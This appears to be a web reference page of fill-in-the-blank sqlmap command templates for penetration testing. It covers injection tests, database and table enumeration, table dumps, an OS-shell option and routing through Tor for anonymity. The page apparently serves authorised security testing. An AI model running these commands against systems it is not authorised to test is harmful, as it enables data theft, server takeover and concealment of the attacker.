Tool

Commander

Copy-ready command templates for common penetration testing tools. Select a tool, fill in the parameters, copy, paste, profit.

sqlmap

↗ docs

Automatic SQL injection and database takeover tool

sql-injectiondatabasewebautomation

Parameters

Basic GET Parameter Test

Test a URL with a GET parameter for SQL injection.

sqlmap -u "" --batch

Test POST Data

Test a POST request body for SQL injection.

sqlmap -u "" --data="" --batch

Test with Cookie

Inject through a cookie parameter.

sqlmap -u "" --cookie="" --batch

Enumerate Databases

List all databases on the server.

sqlmap -u "" --dbs --batch

Enumerate Tables

List all tables in a specific database.

sqlmap -u "" -D --tables --batch

Dump Table Contents

Extract all rows from a specific table.

sqlmap -u "" -D -T --dump --batch

Custom Level & Risk

Increase detection coverage. Level 1–5, Risk 1–3.

sqlmap -u "" --level= --risk= --batch

OS Shell

Attempt to get an interactive OS shell via SQL injection.

sqlmap -u "" --os-shell --batch

Requires FILE and SUPER privileges on MySQL, or equivalent.

Route Through Tor

Send requests through Tor for anonymization.

sqlmap -u "" --tor --tor-type=SOCKS5 --batch

Requires a running Tor service on port 9050.